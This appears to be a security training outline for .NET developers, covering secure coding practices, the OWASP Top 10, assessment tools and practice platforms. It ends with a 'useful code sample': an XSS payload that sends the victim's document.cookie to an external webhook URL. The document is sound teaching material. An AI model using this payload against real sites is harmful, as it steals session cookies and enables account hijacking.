Software security for .Net developers

When and why should we think about security?

Proactive VS Reactive

Cost of remediation

Secure SDLC activities

Secure Coding Practices

1. Input Validation
2. Output Encoding
3. Authentication and Password Management
4. Session Management
5. Access Control
6. Cryptographic Practices
7. Error Handling and Logging
8. Communication Security
9. System Configuration
10. Database Security
11. File Management
12. Memory Management
13. General Coding Practices

OWASP top 10 for WEB

Source

1. Injection
2. Broken Authentication
3. Sensitive Data Exposure
4. XML External Entities (XXE)
5. Broken Access Control
6. Security Misconfiguration
7. Cross-Site Scripting (XSS)
8. Insecure Deserialization
9. Using Components. with known vulnerabilities
10. Insufficient Logging&Monitoring

Weaknesses and vulnerabilities

What is the difference between a vulnerability and a weakness?

Weaknesses are errors that can lead to vulnerabilities.

Common Weaknesses Enumeration

Common Vulnerabilities and Exposures

Application security assessment tools

• sqlmap (open source, SQL injections)
• OWASP ZAP (open source, web app scanner)
• Burp Suite (community edition is free, exploring web security)

Analyze project dependencies

• OWASP Dependency-Check
• other tools

Platforms for practicing

• https://www.hackthebox.eu/
• https://pentesterlab.com/
• http://testphp.vulnweb.com/index.php

Useful Checklists

1. OWASP Application Security Verification Standard 4.0
2. OWAS DotNet Security Cheat Sheet
3. OWASP REST Security Cheat Sheet
4. Transport Layer Protection Cheat Sheet

Useful links

• Check if your email address is in a data breach

Some useful terms you should know

• Symmetric vs. Asymmetric Encryption
• Use signature for request payload
• Denial of service (Dos)
• Brute force attack
• Spoofing
• Phishing
• Sanitization

Useful code samples

XSS to get cookie

<img src=x onerror=this.src=’https://webhook.site/63dc6b4e-3f8f-468e-bb3e-9134e31c39da/?c='+document.cookie>